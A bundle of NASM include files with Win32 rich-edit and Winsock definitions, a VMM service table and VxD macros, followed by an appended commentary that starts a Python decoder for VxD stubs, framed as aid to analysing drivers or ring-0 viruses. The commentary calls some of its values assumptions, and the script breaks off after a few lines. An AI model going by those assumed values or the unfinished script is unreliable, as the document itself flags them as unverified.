PFM_NUMBERING equ 00000020h
PFM_OFFSETINDENT equ 80000000h
PFN_BULLET equ 0001h
PFA_LEFT equ 0001h
PFA_RIGHT equ 0002h
PFA_CENTER equ 0003h
SEL_EMPTY equ 0000h
SEL_TEXT equ 0001h
SEL_OBJECT equ 0002h
SEL_MULTICHAR equ 0004h
SEL_MULTIOBJECT equ 0008h
OLEOP_DOVERB equ 1
;--------------------------riched structures-----------------------------
STRUC CHARFORMAT
.cbSize RESD 1
.dwMask RESD 1
.dwEffects RESD 1
.yHeight RESD 1
.yOffset RESD 1
.crTextColor RESD 1
.bCharSet RESB 1
.bPitchAndFamily RESB 1
.szFaceName RESB 32 ; LF_FACESIZE bytes, not 1
RESW 1 ; tail padding: sizeof(CHARFORMAT) is 60, the control checks cbSize
ENDSTRUC
STRUC CHARRANGE
.cpMin RESD 1
.cpMax RESD 1
ENDSTRUC
STRUC TEXTRANGE
.chrg RESB CHARRANGE_size
.lpstrText RESD 1
ENDSTRUC
STRUC EDITSTREAM
.dwCookie RESD 1
.dwError RESD 1
.pfnCallback RESD 1
ENDSTRUC
STRUC FINDTEXT
.chrg RESB CHARRANGE_size
.lpstrText RESD 1
ENDSTRUC
STRUC FINDTEXTEX
.chrg RESB CHARRANGE_size
.lpstrText RESD 1
.chrgText RESB CHARRANGE_size
ENDSTRUC
STRUC FORMATRANGE
.hdc RESD 1
.hdcTarget RESD 1
.rc RESB RECT_size
.rcPage RESB RECT_size
.chrg RESB CHARRANGE_size
ENDSTRUC
STRUC PARAFORMAT
.cbSize RESD 1
.dwMask RESD 1
.wNumbering RESW 1
.wReserved RESW 1
.dxStartIndent RESD 1
.dxRightIndent RESD 1
.dxOffset RESD 1
.wAlignment RESW 1
.cTabCount RESW 1
.rgxTabs RESD MAX_TAB_STOPS ; 32 tab positions, not a single dword
ENDSTRUC
STRUC MSGFILTER
.nmhdr RESB NMHDR_size
.msg RESD 1
.wParam RESD 1
.lParam RESD 1
ENDSTRUC
STRUC REQRESIZE
.nmhdr RESB NMHDR_size
.rc RESB RECT_size
ENDSTRUC
STRUC SELCHANGE
.nmhdr RESB NMHDR_size
.chrg RESB CHARRANGE_size
.seltyp RESW 1
ENDSTRUC
STRUC ENDROPFILES
.nmhdr RESB NMHDR_size
.hDrop RESD 1
.cp RESD 1
.fProtected RESD 1
ENDSTRUC
STRUC ENPROTECTED
.nmhdr RESB NMHDR_size
.msg RESD 1
.wParam RESD 1
.lParam RESD 1
.chrg RESB CHARRANGE_size
ENDSTRUC
STRUC ENSAVECLIPBOARD
.nmhdr RESB NMHDR_size
.cObjectCount RESD 1
.cch RESD 1
ENDSTRUC
STRUC ENOLEOPFAILED
.nmhdr RESB NMHDR_size
.iob RESD 1
.lOper RESD 1
.hr RESD 1
ENDSTRUC
STRUC ENCORRECTTEXT
.nmhdr RESB NMHDR_size
.chrg RESB CHARRANGE_size
.seltyp RESW 1
ENDSTRUC
STRUC PUNCTUATION
.iSize RESD 1
.szPunctuation RESD 1
ENDSTRUC
STRUC COMPCOLOR
.crText RESD 1
.crBackground RESD 1
.dwEffects RESD 1
ENDSTRUC
STRUC REPASTESPECIAL
.dwAspect RESD 1
.dwParam RESD 1
ENDSTRUC
;--------------------------wsock32 equates-------------------------------
WSADESCRIPTION_LEN equ 256
WSASYS_STATUS_LEN equ 128
IPPROTO_IP equ 0
IPPROTO_ICMP equ 1
IPPROTO_GGP equ 2
IPPROTO_TCP equ 6
IPPROTO_PUP equ 12
IPPROTO_UDP equ 17
IPPROTO_IDP equ 22
IPPROTO_ND equ 77
IPPROTO_RAW equ 255
IPPROTO_MAX equ 256
IOCPARM_MASK equ 7Fh
IOC_VOID equ 20000000h
IOC_OUT equ 40000000h
IOC_IN equ 80000000h
IOC_INOUT equ IOC_IN|IOC_OUT
FIONBIO equ 8004667Eh
FIONSYNC equ 8004667Dh
FIONREAD equ 4004667Fh
IPPORT_ECHO equ 7
IPPORT_DISCARD equ 9
IPPORT_SYSTAT equ 11
IPPORT_DAYTIME equ 13
IPPORT_NETSTAT equ 15
IPPORT_FTP equ 21
IPPORT_TELNET equ 23
IPPORT_SMTP equ 25
IPPORT_TIMESERVER equ 37
IPPORT_NAMESERVER equ 42
IPPORT_WHOIS equ 43
IPPORT_MTP equ 57
IPPORT_TFTP equ 69
IPPORT_RJE equ 77
IPPORT_FINGER equ 79
IPPORT_TTYLINK equ 87
IPPORT_SUPDUP equ 95
IPPORT_EXECSERVER equ 512
IPPORT_LOGINSERVER equ 513
IPPORT_CMDSERVER equ 514
IPPORT_EFSSERVER equ 520
IPPORT_BIFFUDP equ 512
IPPORT_WHOSERVER equ 513
IPPORT_ROUTESERVER equ 520
IPPORT_RESERVED equ 1024
IMPLINK_IP equ 155
IMPLINK_LOWEXPER equ 156
IMPLINK_HIGHEXPER equ 158
IN_CLASSA_NET equ 0FF000000h
IN_CLASSA_NSHIFT equ 24
IN_CLASSA_HOST equ 000FFFFFFh
IN_CLASSA_MAX equ 128
IN_CLASSB_NET equ 0FFFF0000h
IN_CLASSB_NSHIFT equ 16
IN_CLASSB_HOST equ 00000FFFFh
IN_CLASSB_MAX equ 65536
IN_CLASSC_NET equ 0FFFFFF00h
IN_CLASSC_NSHIFT equ 8
IN_CLASSC_HOST equ 0000000FFh
INADDR_ANY equ 000000000h
INADDR_LOOPBACK equ 07F000001h
INADDR_BROADCAST equ 0FFFFFFFFh
INADDR_NONE equ 0FFFFFFFFh
SOCK_STREAM equ 1
SOCK_DGRAM equ 2
SOCK_RAW equ 3
SOCK_RDM equ 4
SOCK_SEQPACKET equ 5
SO_DEBUG equ 00001h
SO_ACCEPTCONN equ 00002h
SO_REUSEADDR equ 00004h
SO_KEEPALIVE equ 00008h
SO_DONTROUTE equ 00010h
SO_BROADCAST equ 00020h
SO_USELOOPBACK equ 00040h
SO_LINGER equ 00080h
SO_OOBINLINE equ 00100h
SOL_SOCKET equ 0FFFFh
SO_DONTLINGER equ (-1-SO_LINGER)
SO_SNDBUF equ 01001h
SO_RCVBUF equ 01002h
SO_SNDLOWAT equ 01003h
SO_RCVLOWAT equ 01004h
SO_SNDTIMEO equ 01005h
SO_RCVTIMEO equ 01006h
SO_ERROR equ 01007h
SO_TYPE equ 01008h
TCP_NODELAY equ 00001h
AF_UNSPEC equ 0
AF_UNIX equ 1
AF_INET equ 2
AF_IMPLINK equ 3
AF_PUP equ 4
AF_CHAOS equ 5
AF_NS equ 6
AF_IPX equ 6
AF_ISO equ 7
AF_OSI equ AF_ISO
AF_ECMA equ 8
AF_DATAKIT equ 9
AF_CCITT equ 10
AF_SNA equ 11
AF_DECnet equ 12
AF_DLI equ 13
AF_LAT equ 14
AF_HYLINK equ 15
AF_APPLETALK equ 16
AF_NETBIOS equ 17
AF_MAX equ 18
PF_UNSPEC equ AF_UNSPEC
PF_UNIX equ AF_UNIX
PF_INET equ AF_INET
PF_IMPLINK equ AF_IMPLINK
PF_PUP equ AF_PUP
PF_CHAOS equ AF_CHAOS
PF_NS equ AF_NS
PF_IPX equ AF_IPX
PF_ISO equ AF_ISO
PF_OSI equ AF_OSI
PF_ECMA equ AF_ECMA
PF_DATAKIT equ AF_DATAKIT
PF_CCITT equ AF_CCITT
PF_SNA equ AF_SNA
PF_DECnet equ AF_DECnet
PF_DLI equ AF_DLI
PF_LAT equ AF_LAT
PF_HYLINK equ AF_HYLINK
PF_APPLETALK equ AF_APPLETALK
PF_MAX equ AF_MAX
SOMAXCONN equ 5
MSG_OOB equ 01h
MSG_PEEK equ 02h
MSG_DONTROUTE equ 04h
MSG_MAXIOVLEN equ 16
MAXGETHOSTSTRUCT equ 1024
FD_READ equ 001h
FD_WRITE equ 002h
FD_OOB equ 004h
FD_ACCEPT equ 008h
FD_CONNECT equ 010h
FD_CLOSE equ 020h
WSABASEERR equ 10000
WSAEINTR equ WSABASEERR+4
WSAEBADF equ WSABASEERR+9
WSAEACCES equ WSABASEERR+13
WSAEFAULT equ WSABASEERR+14
WSAEINVAL equ WSABASEERR+22
WSAEMFILE equ WSABASEERR+24
WSAEWOULDBLOCK equ WSABASEERR+35
WSAEINPROGRESS equ WSABASEERR+36
WSAEALREADY equ WSABASEERR+37
WSAENOTSOCK equ WSABASEERR+38
WSAEDESTADDRREQ equ WSABASEERR+39
WSAEMSGSIZE equ WSABASEERR+40
WSAEPROTOTYPE equ WSABASEERR+41
WSAENOPROTOOPT equ WSABASEERR+42
WSAEPROTONOSUPPORT equ WSABASEERR+43
WSAESOCKTNOSUPPORT equ WSABASEERR+44
WSAEOPNOTSUPP equ WSABASEERR+45
WSAEPFNOSUPPORT equ WSABASEERR+46
WSAEAFNOSUPPORT equ WSABASEERR+47
WSAEADDRINUSE equ WSABASEERR+48
WSAEADDRNOTAVAIL equ WSABASEERR+49
WSAENETDOWN equ WSABASEERR+50
WSAENETUNREACH equ WSABASEERR+51
WSAENETRESET equ WSABASEERR+52
WSAECONNABORTED equ WSABASEERR+53
WSAECONNRESET equ WSABASEERR+54
WSAENOBUFS equ WSABASEERR+55
WSAEISCONN equ WSABASEERR+56
WSAENOTCONN equ WSABASEERR+57
WSAESHUTDOWN equ WSABASEERR+58
WSAETOOMANYREFS equ WSABASEERR+59
WSAETIMEDOUT equ WSABASEERR+60
WSAECONNREFUSED equ WSABASEERR+61
WSAELOOP equ WSABASEERR+62
WSAENAMETOOLONG equ WSABASEERR+63
WSAEHOSTDOWN equ WSABASEERR+64
WSAEHOSTUNREACH equ WSABASEERR+65
WSAENOTEMPTY equ WSABASEERR+66
WSAEPROCLIM equ WSABASEERR+67
WSAEUSERS equ WSABASEERR+68
WSAEDQUOT equ WSABASEERR+69
WSAESTALE equ WSABASEERR+70
WSAEREMOTE equ WSABASEERR+71
WSASYSNOTREADY equ WSABASEERR+91
WSAVERNOTSUPPORTED equ WSABASEERR+92
WSANOTINITIALISED equ WSABASEERR+93
WSAHOST_NOT_FOUND equ WSABASEERR+1001
HOST_NOT_FOUND equ WSAHOST_NOT_FOUND
WSATRY_AGAIN equ WSABASEERR+1002
TRY_AGAIN equ WSATRY_AGAIN
WSANO_RECOVERY equ WSABASEERR+1003
NO_RECOVERY equ WSANO_RECOVERY
WSANO_DATA equ WSABASEERR+1004
NO_DATA equ WSANO_DATA
WSANO_ADDRESS equ WSANO_DATA
NO_ADDRESS equ WSANO_ADDRESS
EWOULDBLOCK equ WSAEWOULDBLOCK
EINPROGRESS equ WSAEINPROGRESS
EALREADY equ WSAEALREADY
ENOTSOCK equ WSAENOTSOCK
EDESTADDRREQ equ WSAEDESTADDRREQ
EMSGSIZE equ WSAEMSGSIZE
EPROTOTYPE equ WSAEPROTOTYPE
ENOPROTOOPT equ WSAENOPROTOOPT
EPROTONOSUPPORT equ WSAEPROTONOSUPPORT
ESOCKTNOSUPPORT equ WSAESOCKTNOSUPPORT
EOPNOTSUPP equ WSAEOPNOTSUPP
EPFNOSUPPORT equ WSAEPFNOSUPPORT
EAFNOSUPPORT equ WSAEAFNOSUPPORT
EADDRINUSE equ WSAEADDRINUSE
EADDRNOTAVAIL equ WSAEADDRNOTAVAIL
ENETDOWN equ WSAENETDOWN
ENETUNREACH equ WSAENETUNREACH
ENETRESET equ WSAENETRESET
ECONNABORTED equ WSAECONNABORTED
ECONNRESET equ WSAECONNRESET
ENOBUFS equ WSAENOBUFS
EISCONN equ WSAEISCONN
ENOTCONN equ WSAENOTCONN
ESHUTDOWN equ WSAESHUTDOWN
ETOOMANYREFS equ WSAETOOMANYREFS
ETIMEDOUT equ WSAETIMEDOUT
ECONNREFUSED equ WSAECONNREFUSED
ELOOP equ WSAELOOP
ENAMETOOLONG equ WSAENAMETOOLONG
EHOSTDOWN equ WSAEHOSTDOWN
EHOSTUNREACH equ WSAEHOSTUNREACH
ENOTEMPTY equ WSAENOTEMPTY
EPROCLIM equ WSAEPROCLIM
EUSERS equ WSAEUSERS
EDQUOT equ WSAEDQUOT
ESTALE equ WSAESTALE
EREMOTE equ WSAEREMOTE
FD_SETSIZE equ 64
INVALID_SOCKET equ (-1-0)
SOCKET_ERROR equ -1
SOCKET_BUFFER_SIZE equ 512
ICMP_ECHOREPLY equ 0
ICMP_ECHOREQ equ 8
;------------------------wsock32 structures-----------------------------
STRUC fd_setstruc
.fd_count RESD 1
.fd_array RESD FD_SETSIZE ; 64 socket handles, not one
ENDSTRUC
STRUC timeval
.tv_sec RESD 1
.tv_usec RESD 1
ENDSTRUC
STRUC sockaddr_in
.sin_family RESW 1
.sin_port RESW 1
.sin_addr RESD 1
.sin_zero RESB 8
ENDSTRUC
STRUC sockaddr
.sa_family RESW 1
.sa_data RESB 14 ; generic sockaddr is 16 bytes total
ENDSTRUC
STRUC WSAdata
.wVersion RESW 1
.wHighVersion RESW 1
.szDescription RESB WSADESCRIPTION_LEN+1
.szSystemStatus RESB WSASYS_STATUS_LEN+1
.iMaxSockets RESW 1
.iMaxUdpDg RESW 1
RESW 1 ; alignment padding: lpVendorInfo is at offset 396, sizeof(WSADATA) = 400
.lpVendorInfo RESD 1
ENDSTRUC
STRUC sockproto
.sp_family RESW 1
.sp_protocol RESW 1
ENDSTRUC
STRUC linger
.l_onoff RESW 1
.l_linger RESW 1
ENDSTRUC
STRUC hostentStru
.h_name RESD 1
.h_alias RESD 1
.h_addr RESW 1
.h_len RESW 1
.h_list RESD 1
ENDSTRUC
STRUC netent
.n_name RESD 1
.n_aliases RESD 1
.n_addrtype RESW 1
RESW 1 ; alignment padding, n_net is dword-aligned at offset 12
.n_net RESD 1
ENDSTRUC
STRUC servent
.s_name RESD 1
.s_aliases RESD 1
.s_port RESW 1
RESW 1 ; alignment padding, s_proto is dword-aligned at offset 12
.s_proto RESD 1
ENDSTRUC
STRUC icmp_hdr
.icmp_type RESB 1
.icmp_code RESB 1
.icmp_cksum RESW 1
.icmp_id RESW 1
.icmp_seq RESW 1
.icmp_data RESB 1
ENDSTRUC
STRUC ip_hdr
.ip_hlv RESB 1
.ip_tos RESB 1
.ip_len RESW 1
.ip_id RESW 1
.ip_off RESW 1
.ip_ttl RESB 1
.ip_p RESB 1
.ip_cksum RESW 1
.ip_src RESD 1
.ip_dest RESD 1
ENDSTRUC
STRUC ICMP_OPTIONS
.Ttl RESB 1
.Tos RESB 1
.Flags RESB 1
.OptionsSize RESB 1
.OptionsData RESD 1
ENDSTRUC
STRUC ICMP_ECHO_REPLY
.Address RESD 1
.Status RESD 1
.RoundTripTime RESD 1
.DataSize RESW 1
.Reserved RESW 1
.DataPointer RESD 1
.Options RESB ICMP_OPTIONS_size ; embedded ip_option_information (8 bytes), not a pointer
.zData RESB 250
ENDSTRUC
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WIN32N.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WINDDK.INC]ÄÄÄ
;///////////////////////////////////////////////////////////////////
;// winddk.inc
;//
;// This NASM include file has been autogenerated by VXDi2n
;// from Windows DDK Include directory ()
;//
%ifndef INCLUDED_WINDDK_INC__
%define INCLUDED_WINDDK_INC__
%ifdef WIN403SERVICES
VMM_Service _PageOutPages ; 0x0192 ord
VMM_Service _Call_On_My_Not_Flat_Stack ; 0x0193 ord
VMM_Service _LinRegionLock ; 0x0194 ord
VMM_Service _LinRegionUnLock ; 0x0195 ord
VMM_Service _AttemptingSomethingDangerous ; 0x0196 ord
VMM_Service _Vsprintf ; 0x0197 ord
VMM_Service _Vsprintfw ; 0x0198 ord
VMM_Service Load_FS_Service ; 0x0199 ord
VMM_Service Assert_FS_Service ; 0x019a ord
VMM_Service ObsoleteRtlUnwind ; 0x019b ord
VMM_Service ObsoleteRtlRaiseException ; 0x019c ord
VMM_Service ObsoleteRtlRaiseStatus ; 0x019d ord
VMM_Service ObsoleteKeGetCurrentIrql ; 0x019e ord
VMM_Service ObsoleteKfRaiseIrql ; 0x019f ord
VMM_Service ObsoleteKfLowerIrql ; 0x01a0 ord
VMM_Service _Begin_Preemptable_Code ; 0x01a1 ord
VMM_Service _End_Preemptable_Code ; 0x01a2 ord
VMM_Service Set_Preemptable_Count ; 0x01a3 ord
VMM_Service ObsoleteKeInitializeDpc ; 0x01a4 ord
VMM_Service ObsoleteKeInsertQueueDpc ; 0x01a5 ord
VMM_Service ObsoleteKeRemoveQueueDpc ; 0x01a6 ord
VMM_Service HeapAllocateEx ; 0x01a7 ord
VMM_Service HeapReAllocateEx ; 0x01a8 ord
VMM_Service HeapGetSizeEx ; 0x01a9 ord
VMM_Service HeapFreeEx ; 0x01aa ord
VMM_Service _Get_CPUID_Flags ; 0x01ab ord
VMM_Service KeCheckDivideByZeroTrap ; 0x01ac ord
%endif
%ifdef WIN41SERVICES
VMM_Service _RegisterGARTHandler ; 0x01ad ord
VMM_Service _GARTReserve ; 0x01ae ord
VMM_Service _GARTCommit ; 0x01af ord
VMM_Service _GARTUnCommit ; 0x01b0 ord
VMM_Service _GARTFree ; 0x01b1 ord
VMM_Service _GARTMemAttributes ; 0x01b2 ord
VMM_Service KfRaiseIrqlToDpcLevel ; 0x01b3 ord
VMM_Service VMMCreateThreadEx ; 0x01b4 ord
VMM_Service _FlushCaches ; 0x01b5 ord
VMM_Service Set_Thread_Win32_Pri_NoYield ; 0x01b6 ord
VMM_Service _FlushMappedCacheBlock ; 0x01b7 ord
VMM_Service _ReleaseMappedCacheBlock ; 0x01b8 ord
VMM_Service Run_Preemptable_Events ; 0x01b9 ord
VMM_Service _MMPreSystemExit ; 0x01ba ord
VMM_Service _MMPageFileShutDown ; 0x01bb ord
VMM_Service _Set_Global_Time_Out_Ex ; 0x01bc ord
VMM_Service Query_Thread_Priority ; 0x01bd ord
%endif
End_Service_Table VMM
%endif ; INCLUDED_WINDDK_INC__
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WINDDK.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[VXDN.INC]ÄÄÄ
;////////////////////////////////////////////////////////////
;// vxdn.inc
;//
;// VxD definitions for NASM
;//
;// Collective effort of fOSSiL and The Owl =)
;//
;// 06-Aug-1999 fOSSiL Initial version
;// 16-Jan-2000 The Owl bunch of structs and equates
;// 16-Jan-2000 fOSSiL Separated Auto-generated stuff from hand-made, better MASM-compat
;// 18-Jan-2000 The Owl modified DDB builder macro
%ifndef INCLUDED_VXDN_INC
%define INCLUDED_VXDN_INC
DIOC_GETVERSION EQU 0H
DIOC_OPEN EQU DIOC_GETVERSION
DIOC_CLOSEHANDLE EQU -1
%macro VxD_Service 2
@@%2 EQU (%1_Device_ID << 16) | __Cur_Service_Num__
%assign __Cur_Service_Num__ (__Cur_Service_Num__ + 1)
%ifdef Create_Service_Table_%1
dd %2
%endif
%endmacro
%macro Begin_Service_Table 1
%assign __Cur_Service_Num__ 0
%define %1_Service VxD_Service %1,
%ifdef Create_Service_Table_%1
[segment _LDATA]
%1_Service_Table:
%endif
%endmacro
%macro End_Service_Table 1
Num_%1_Services equ __Cur_Service_Num__
%undef __Cur_Service_Num__
%undef %1_Service
%ifdef Create_Service_Table_%1
__SECT__
%endif
%endmacro
%include "winddk.inc"
struc cb_s
CB_VM_Status resd 1
CB_High_Linear resd 1
CB_Client_Pointer resd 1
CB_VMID resd 1
CB_Signature resd 1
endstruc
struc tcb_s
TCB_Flags resd 1 ; 00
TCB_Reserved1 resd 1 ; 04
TCB_Reserved2 resd 1 ; 08
TCB_Signature resd 1 ; 0C
TCB_ClientPtr resd 1 ; 10
TCB_VMHandle resd 1 ; 14
TCB_ThreadId resw 1 ; 18
TCB_PMLockOrigSS resw 1 ; 1A
TCB_PMLockOrigESP resd 1 ; 1C
TCB_PMLockOrigEIP resd 1 ; 20
TCB_PMLockStackCount resd 1 ; 24
TCB_PMLockOrigCS resw 1 ; 28
TCB_PMPSPSelector resw 1 ; 2A
TCB_ThreadType resd 1 ; 2C
TCB_pad1 resw 1 ;
TCB_pad2 resb 1 ;
TCB_extErrLocus resb 1 ;
TCB_extErr resw 1 ;
TCB_extErrAction resb 1 ;
TCB_extErrClass resb 1 ;
TCB_extErrPtr resd 1 ;
endstruc
SCHED_OBJ_ID_THREAD EQU 42434854H
THFLAG_SUSPENDED_BIT EQU 03H
THFLAG_SUSPENDED EQU (1 << THFLAG_SUSPENDED_BIT)
THFLAG_NOT_EXECUTEABLE_BIT EQU 04H
THFLAG_NOT_EXECUTEABLE EQU (1 << THFLAG_NOT_EXECUTEABLE_BIT)
THFLAG_THREAD_CREATION_BIT EQU 08H
THFLAG_THREAD_CREATION EQU (1 << THFLAG_THREAD_CREATION_BIT)
THFLAG_THREAD_BLOCKED_BIT EQU 0AH
THFLAG_THREAD_BLOCKED EQU (1 << THFLAG_THREAD_BLOCKED_BIT)
THFLAG_RING0_THREAD_BIT EQU 1CH
THFLAG_RING0_THREAD EQU (1 << THFLAG_RING0_THREAD_BIT)
THFLAG_ASYNC_THREAD_BIT EQU 1FH
THFLAG_ASYNC_THREAD EQU (1 << THFLAG_ASYNC_THREAD_BIT)
THFLAG_CHARSET_BITS EQU 10H
THFLAG_CHARSET_MASK EQU (3 << THFLAG_CHARSET_BITS)
THFLAG_ANSI EQU (0 << THFLAG_CHARSET_BITS)
THFLAG_OEM EQU (1 << THFLAG_CHARSET_BITS)
THFLAG_UNICODE EQU (2 << THFLAG_CHARSET_BITS)
THFLAG_RESERVED EQU (3 << THFLAG_CHARSET_BITS)
THFLAG_EXTENDED_HANDLES_BIT EQU 12H
THFLAG_EXTENDED_HANDLES EQU (1 << THFLAG_EXTENDED_HANDLES_BIT)
THFLAG_OPEN_AS_IMMOVABLE_FILE_BIT EQU 13H
THFLAG_OPEN_AS_IMMOVABLE_FILE EQU (1 << THFLAG_OPEN_AS_IMMOVABLE_FILE_BIT)
struc pmcb_s
PMCB_Flags resd 1
PMCB_Parent resd 1
endstruc
struc Exception_Handler_Struc
EHS_Reserved resd 1
EHS_Start_EIP resd 1
EHS_End_EIP resd 1
EHS_Handler resd 1
endstruc
struc VMFaultInfo
VMFI_EIP resd 1
VMFI_CS resw 1
VMFI_Ints resw 1
endstruc
LF_ASYNC_BIT EQU 0
LF_ASYNC EQU (1 << LF_ASYNC_BIT)
LF_USE_HEAP_BIT EQU 1
LF_USE_HEAP EQU (1 << LF_USE_HEAP_BIT)
LF_ALLOC_ERROR_BIT EQU 2
LF_ALLOC_ERROR EQU (1 << LF_ALLOC_ERROR_BIT)
LF_SWAP EQU (LF_USE_HEAP+(1 << 3))
VXDLDR_ERR_OUT_OF_MEMORY EQU 1
VXDLDR_ERR_IN_DOS EQU 2
VXDLDR_ERR_FILE_OPEN_ERROR EQU 3
VXDLDR_ERR_FILE_READ EQU 4
VXDLDR_ERR_DUPLICATE_DEVICE EQU 5
VXDLDR_ERR_BAD_DEVICE_FILE EQU 6
VXDLDR_ERR_DEVICE_REFUSED EQU 7
VXDLDR_ERR_NO_SUCH_DEVICE EQU 8
VXDLDR_ERR_DEVICE_UNLOADABLE EQU 9
VXDLDR_ERR_ALLOC_V86_AREA EQU 10
VXDLDR_ERR_BAD_API_FUNCTION EQU 11
VXDLDR_ERR_MAX EQU 11
VXDLDR_NOTIFY_OBJECTUNLOAD EQU 0
VXDLDR_NOTIFY_OBJECTLOAD EQU 1
VXDLDR_APIFUNC_GETVERSION EQU 0
VXDLDR_APIFUNC_LOADDEVICE EQU 1
VXDLDR_APIFUNC_UNLOADDEVICE EQU 2
struc DIOCParams
.Internal1 resd 1
.VMHandle resd 1
.Internal2 resd 1
.dwIoControlCode resd 1
.lpvInBuffer resd 1
.cbInBuffer resd 1
.lpvOutBuffer resd 1
.cbOutBuffer resd 1
.lpcbBytesReturned resd 1
.lpoOverlapped resd 1
.hDevice resd 1
.tagProcess resd 1
endstruc
struc DIOCRegs
.reg_EBX resd 1
.reg_EDX resd 1
.reg_ECX resd 1
.reg_EAX resd 1
.reg_EDI resd 1
.reg_ESI resd 1
.reg_Flags resd 1
endstruc
%ifndef FILE_FLAG_OVERLAPPED
struc _OVERLAPPED
.O_Internal resd 1
.O_InternalHigh resd 1
.O_Offset resd 1
.O_OffsetHigh resd 1
.O_hEvent resd 1
endstruc
%endif
%macro GetDeviceServiceOrdinal 2
mov %1, @@%2
%endmacro
%macro VxDJmp 1
db 0xCD, 0x20
dd (@@%1 | 0x80000000)
%endmacro
%define VxDjmp VxDJmp
%macro VMMJmp 1
%if (@@%1 >> 16) <> VMM_Device_ID
%error %1 is not a VMM Service
%endif
VxDJmp %1
%endmacro
struc VxD_Desc_Block
DDB_Next resd 1
DDB_SDK_Version resw 1; DW DDK_VERSION
DDB_Req_Device_Number resw 1; DW UNDEFINED_DEVICE_ID
DDB_Dev_Major_Version resb 1; DB 0
DDB_Dev_Minor_Version resb 1; DB 0
DDB_Flags resw 1; DW 0
DDB_Name resb 8; DB " "
DDB_Init_Order resd 1; DD UNDEFINED_INIT_ORDER
DDB_Control_Proc resd 1; DD ?
DDB_V86_API_Proc resd 1; DD 0
DDB_PM_API_Proc resd 1; DD 0
DDB_V86_API_CSIP resd 1; DD 0
DDB_PM_API_CSIP resd 1; DD 0
DDB_Reference_Data resd 1; DD ?
DDB_Service_Table_Ptr resd 1; DD 0
DDB_Service_Table_Size resd 1; DD 0
DDB_Win32_Service_Table resd 1; DD 0
DDB_Prev resd 1; DD 'Prev'
DDB_Size resd 1; DD SIZE(VxD_Desc_Block)
DDB_Reserved1 resd 1; DD 'Rsv1'
DDB_Reserved2 resd 1; DD 'Rsv2'
DDB_Reserved3 resd 1; DD 'Rsv3'
endstruc
;
; Params 5-9 are optional, since most of the time they are generic
; params: devname, quoted devname, major, minor, devid, initorder, v86, pm, ref
; Control_Proc must be named devname_Control
;
%macro Declare_Virtual_Device 4-9 UNDEFINED_DEVICE_ID, UNDEFINED_INIT_ORDER, 0, 0, 0
global %1_DDB
%1_DDB:
istruc VxD_Desc_Block
at DDB_Next, dd 0
at DDB_SDK_Version, dw DDK_VERSION
at DDB_Req_Device_Number, dw %5
at DDB_Dev_Major_Version, db %3
at DDB_Dev_Minor_Version, db %4
at DDB_Flags, dw 0
%%start:
at DDB_Name, db %2
%%end:
TIMES 8-(%%end-%%start) db ' '
at DDB_Init_Order, dd %6
at DDB_Control_Proc, dd %1_Control
at DDB_V86_API_Proc, dd %7
at DDB_PM_API_Proc, dd %8
at DDB_V86_API_CSIP, dd 0
at DDB_PM_API_CSIP, dd 0
at DDB_Reference_Data, dd %9
%ifdef Create_Service_Table_%1
at DDB_Service_Table_Ptr, dd %1_Service_Table
at DDB_Service_Table_Size, dd Num_%1_Services
%else
at DDB_Service_Table_Ptr, dd 0
at DDB_Service_Table_Size, dd 0
%endif
at DDB_Win32_Service_Table, dd 0
at DDB_Prev, db 'verP'
at DDB_Size, dd VxD_Desc_Block_size
at DDB_Reserved1, db '1vsR'
at DDB_Reserved2, db '2vsR'
at DDB_Reserved3, db '3vsR'
iend
%endmacro
%macro Trace_Out 1
[segment _LDATA]
%%msg: db %1, 13, 10, 0
__SECT__
push dword %%msg
VMMCall _Trace_Out_Service
%endmacro
%macro Trace_Outcc 2
j%-1 %%cont
Trace_Out %2
%%cont:
%endmacro
%macro Trace_OutE 1
Trace_Outcc e, %1
%endmacro
%define Trace_OutZ Trace_OutE
%macro Trace_OutNE 1
Trace_Outcc ne, %1
%endmacro
%define Trace_OutNZ Trace_OutNE
%macro Trace_OutC 1
Trace_Outcc c, %1
%endmacro
%macro Trace_OutNC 1
Trace_Outcc nc, %1
%endmacro
%endif
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[VXDN.INC]ÄÄÄ
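The two macros above fix the on-disk shape of everything a VxD does at ring 0: VxDJmp emits `int 20h` followed by a dword whose high word is the device ID and low word the service ordinal (bit 31 set marks a jmp rather than a call), and Declare_Virtual_Device lays out the 80-byte VxD_Desc_Block that the loader walks. When you pull a Win9x driver or a ring-0 virus body apart, the first job is to recover those stubs and that block. The Python below is an added analysis example, not code from vxdn.inc or winddk.inc: it scans raw code for the dynamic-link stubs and parses/builds a DDB using the layouts shown above. The VMM ordinal names are the ones listed in the winddk.inc excerpt; the device-ID names other than VMM and the DDK_VERSION / UNDEFINED_* values are from memory of vmm.inc and are assumptions here.

```python
"""Decode Win9x VxD dynamic-link stubs and Device Descriptor Blocks (DDBs).

Added analysis example; not code from vxdn.inc/winddk.inc. Stub encoding follows
the VxDJmp macro (int 20h + dword: hi word device ID, lo word ordinal, bit 31 =
jmp). DDB layout follows VxD_Desc_Block / Declare_Virtual_Device. Device names
other than VMM and the DDK_VERSION / UNDEFINED_* values are assumptions.
"""
import struct
from typing import Dict, List, Optional

DYNA_LINK_INT = b"\xCD\x20"      # int 20h
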